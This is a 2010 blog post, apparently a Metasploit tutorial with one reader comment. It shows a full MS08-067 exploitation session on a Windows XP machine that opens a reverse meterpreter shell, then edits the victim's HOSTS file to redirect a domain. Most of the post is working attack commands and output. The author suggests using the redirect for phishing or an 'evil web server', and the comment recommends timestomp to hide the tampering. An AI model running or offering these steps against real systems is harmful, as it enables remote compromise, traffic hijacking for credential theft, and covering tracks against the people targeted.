Modifying The Victim’s HOSTS File In Metasploit

January 30, 2010 – 7:25 PM

This is just a quick example of how you can quickly and easily modify the HOSTS file on a compromised Windows system using the meterpreter script called hostsedit.  As always, we start off with a basic exploit to gain a meterpreter session back from the victim’s machine:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set rhost 10.6.18.104
rhost => 10.6.18.104
msf exploit(ms08_067_netapi) > set lhost 10.6.18.100
lhost => 10.6.18.100
msf exploit(ms08_067_netapi) > exploit

[*] Handler trying to bind to 10.6.18.100
[*] Started reverse handler on port 4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability…
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (10.6.18.100:4444 -> 10.6.18.104:1085)

meterpreter >

Now we are just going to run the hostsedit meterpreter script, look at the options, and modify the HOSTS file:

meterpreter > run hostsedit -h
This Meterpreter script is for adding entries in to the Windows Hosts file.
Since Windows will check first the Hosts file instead of the configured DNS Server
it will assist in diverting traffic to the fake entry or entries. Either a single
entry can be provided or a series of entries provided a file with one per line.

OPTIONS:

-e Host entry in the format of IP,Hostname.
-h Help Options.
-l Text file with list of entries in the format of IP,Hostname. One per line.

Example:

run hostsedit -e 127.0.0.1,google.com

run hostsedit -l /tmp/fakednsentries.txt

meterpreter > run hostsedit -e 127.0.0.1,www.google.com
[*] Making Backup of the hosts file.
[*] Backup loacated in C:\WINDOWS\System32\drivers\etc\hosts82257.back
[*] Adding Record for Host www.google.com with IP 127.0.0.1
[*] Clearing the DNS Cache
meterpreter >

Looks like it was successful.  Let’s see:

Worked like a charm.  Of course you can do many other things than to just pipe www.google.com to localhost.  (setup an evil web server lately??  simple phishing site??)

  1. One Response to “Modifying The Victim’s HOSTS File In Metasploit”

  2. And you might want to run timestomp against it afterwards and alter the MACE values.

    By manunkind on Jan 30, 2010

You must be logged in to post a comment.